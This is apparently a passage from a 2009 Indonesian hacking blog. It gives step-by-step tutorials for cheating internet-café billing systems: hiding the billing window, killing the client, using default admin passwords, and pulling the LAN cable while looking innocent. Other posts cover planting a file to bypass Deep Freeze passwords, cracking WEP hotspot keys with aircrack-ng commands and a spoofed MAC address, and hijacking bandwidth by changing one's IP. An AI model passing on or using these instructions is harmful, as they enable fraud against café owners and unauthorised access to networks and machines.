09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+X untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif

CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan

CTRL+ALT+L Menampilkan dialog zhider

CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Cara 2:

Nyalain kompi .Setelah loading windows tekan tahan Ctrl+Alt+Del sebelum keluar jendela billing(harus cepet coz jendela billing muncul hanya 2 detik setelah loading windows). Setelah kluar task manager klik [ End Task ] pada aplikasi [ client 008 ].

Cara 3:

Menggunakan software Billing Hack(bisa download di http://www.vb-bego.com). Software ini bahkan bisa mereset time billing.
Bisa juga sebelum nyalain kompi cabut kabel LAN di belakang CPU. Biar gak terlalu mencurigakan, cabut kabelnya sambil pura-pura pasang USB ato Flash Disk (sambil nyelam mancing ikan gitu deh pepatahnya).Trus nyalain kompi tunggu sampai jendela billing keluar. Klik Admin masukkan password default008. Trus di Exit Client&Password masukkan juga password 008. Abis tu, setelah muncul kotak yang terakhir cari tanda ****** yang letaknya paling bawah kiri, delet tanda tsb dan terakhir klik Exit Client yang terletak di sebelah kanan tanda yang telah kita hapus tadi. Jadi deh….

Kalo semua cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhoi Tuhan Kalo ketahuan langsung pertebal [muka bego-mu]. Misalnya bilang… Eh, kok jadi gini ya? Kemaren ga gini kok. Ato kata-kata lain, tergantung kreatifitas kamu.

Jebol deep freeze v.6 ++ Juni 4, 2009

Posted by whiray in Hacker.
1 comment so far

nih tutor cuman buat newbie kaya gua ini,.
buat yg udah master mohon koreksiannya,.

nih salah satu cara gmn jebolin DeepFreeze V.6 keatas,.

langsung aja dah,

Peralatan yg dibutuhin,.
1. USB 512mb (knp pake FD? coz kalo di warnet nda semua PC ada CD-romnya)
2. linux Slax
3. $Persi0.sys

pertama lo format dulu FD lo,.
kalo udah kosong, download nih
linux slax (190mb)

abis lo donlod,
trus lo Extract file linux yg bru ja lu donlod ke FD lo,
tunggu ampe selesai,.

nah kalo udah selesai,
masuk ke folder Boot yg ada di FD lo,
trus klik Bootinst.bat (ikutin langkah slanjutnya)

kalo udah beres, donlot jg nih file
di sini
di sini
di sini

pilih aja slh satu link di ats, bwt di donlot,.
trus taro di FD,

kalo semuanya udah beres tinggal restart PC lu dah,
trus boot lwt FD (caranya wktu booting teken aja F8) pilih FD lu,.
oia, nda semua PC bisa pilih’n booting lwt F8, coz tergantung Mobonya,
kalo lwt bios nda tau w pilih yg mana first bootnya,.

kalo udah bisa booting,
ydh tinggal masuk ke linuxnya aja,.

nah kalo udah masuk ke linux tinggal ikutin lngkah” brikut,..

– buka Konsole (commandnya linux)
– ketik mkdir /mnt/baidhowi (enter)
– ketik mount -t ntfs-3g /dev/hda1 /mnt/baidhowi -o force (enter)

tunggu ampe selesai,
/dev/hda1 itu nama driver C windows,
jadi sesuain dulu nama driver C lu di linux apa,..

kalo udah tinggal buka, /dev/hda1 (ini partisi windows driver C)
yg tadi udah di Mount
trus copy n pastein file $Persi0.sys yg td udh di donod,
ke partisi C windows tsb,.

kalo udah tinggal restart linux, trus masuk ke windows kaya biasa,.
kalo udah pencet Shift+Ctrl+alt+F6 buat buka DF trus isi passwordnya
“baidhowi” tanpa tanda kutip

selesai,.

tested DeepFreeze V6.30

Menembus Hostpot Yang Menggunakan Key Wep Juni 4, 2009

Posted by whiray in Hacker.
2 comments

pertama harus punya backtrack 3(peralatan perang) bagi yang belum punya silahkan download di bawah

sekarang waktunya hacking wep

masuk konsole linux sama seperti cmd klo diwindows

setelah kamu harus merubah wifi kamu jadi monitor mode.

iwconfig

airmon-ng stop [device]
misal airmon-ng stop ath1 atau airmon-ng stop wlan1

lalu

ifconfig down [device]

sekarang kamu harus rubah mac address wifi

macchanger –mac 00:11:22:33:44:66 [device]

setelah mengganti macnya

airmon-ng start [wifi]

nah sekarang kamu dalam posisi monitor mode[/color]

untitled-69 images
mencari target

airodump-ng [wifi]
setelah kamu tahu targetnya. sekarang catat target

untitled-69 images

pengumpulan data

airodump-ng -c [channel] -w [network] –bssid [bssid] [device]

untitled-69 images

[color=lime]network : file bertipe .cap (terserah tulis apa aja)
device : wlan kamu

setelah itu airodump -ng jangan ditutp buka lagi konsole yang baru
agar data cepat terkumpul tambahkan

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

untitled-69 images

biar lebih cepat lagi pengumpulan data maka
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

untitled-69 images

lebih turbo lagi pengumpulan packetnya
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

untitled-69 images

lebih turbo lagi pengumpulan packetnya.he…he….

ulangi langkah yang di bold dengan konsole baru agar mempercepat

untitled-69 images

jika dirasa packetnya sudah cukup sekarang waktunya hacking key wep. tapi ingat pengumpul packet jangan ditutup biarkan terus mengumpulkan packetnya

aircrack-ng -n 128 -b [bssid] [filename].cap

-n tipe enkripsi (64 ato 128)
*.cap ato *.ivs ekstensi file yg disave

tunggu saja ini bekerja otomatis jika packetnya ternyata kurang. diamkan saja karena petugas pengumpul packet masih berkerja untuk mengumpulkan packet. silahkan istirahat dulu ato minum kopi
dan
dooommm key wep sudah ditemukan

untitled-69 images

Selanjut nya terserah anda

link :
Backtrack

Rampok koneksi di warnet Juni 4, 2009

Posted by whiray in Hacker.
1 comment so far

Bila main di warnet, coba terapin cara ini. Kondisinya ya ada yg bisa dan ada yang nggak. Tp jangan kecewa ama gw kalo ga berhasil ye!! Mungkin udah di lock ma IT nya!

Ini gak pantas disebut tutor, hanya cara kecil2an. Gara2 di kantor tempat gawe dulu dibatasi kecepatan internetnya, maka gw membangkang sendiri. Mungkin bs dipraktekkan bagi yang usil pas main diwarnet (maunya kencang sendiri!) dan networking di OS tidak dikunci sama admin

1. Buka icon network di taskbar (deket jam yang nyala2 itu, wah gw harap km tau apa yg gw sebutin)
2. Klik kanan Status, di General pilih Properties, lanjut dgn TCP/IP .
3. Misalnya aja disitu IP nya yg paling atas 192.168.0.22 , asumsinya km dikomputer 22 (biasanya warnet me nomori IP berdasar PC biar ga bingung)
4. kamu ganti aja 22 itu jadi nomor acak, yang paling 100 keatas 120 kek atau 122, ingat ip juga ada batasan sampe 255 dan ga mungkin warnet sampe 255 komputer. Jangan sampe bentrok dengan Komputer lain ya. Kalo udah ganti klik ok dan close.
5. Silahkan km browsing + download sepuasmu, komputer tetanggamu mungkin akan menggerutu karena tiba2 lambat, atau bs juga si OP kena musibah lambat jg. kalau main game, wah ga ada lagnya karena semua abis disedot kamu.
6. kalau mau off, balikin ke IP semula, soalnya kalau ip nya ga cocok pas close billing gak bisa!! (kadang)

cara ini berfungsi baik kalo :
1. Tiap IP sudah dibatasi koneksinya oleh router software
2. Tidak dikunci oleh IT pada bagian properties tadi

Tidak direkomendasikan :
1. Buat OP warnet!! kasian User!!

Met HappY Ria Bro…

Merusak Billing pro 6 Di warnet Juni 4, 2009

Posted by whiray in Hacker.
add a comment

Nie langkah”nya.

1. copot dolo kabel LAN… (supaya connect ga connect ke server dan lebih lama utk masuk ke billing)
2.pasang kompi…
3. sesudah muncul welcome… tahan ctrl + Alt + Del (deletenya di tahan)
4. tgg sampe muncul task manager sampe 300x dan muncul akses terminate…
5. tinggal ok semua taksmanager yg ada…
6. pasang kaberl LAN dan met maen gratiss…

ingat…. klw billingnya keluar restart lagi kompi…
balik ke langkah ke dua.
Met mencoba.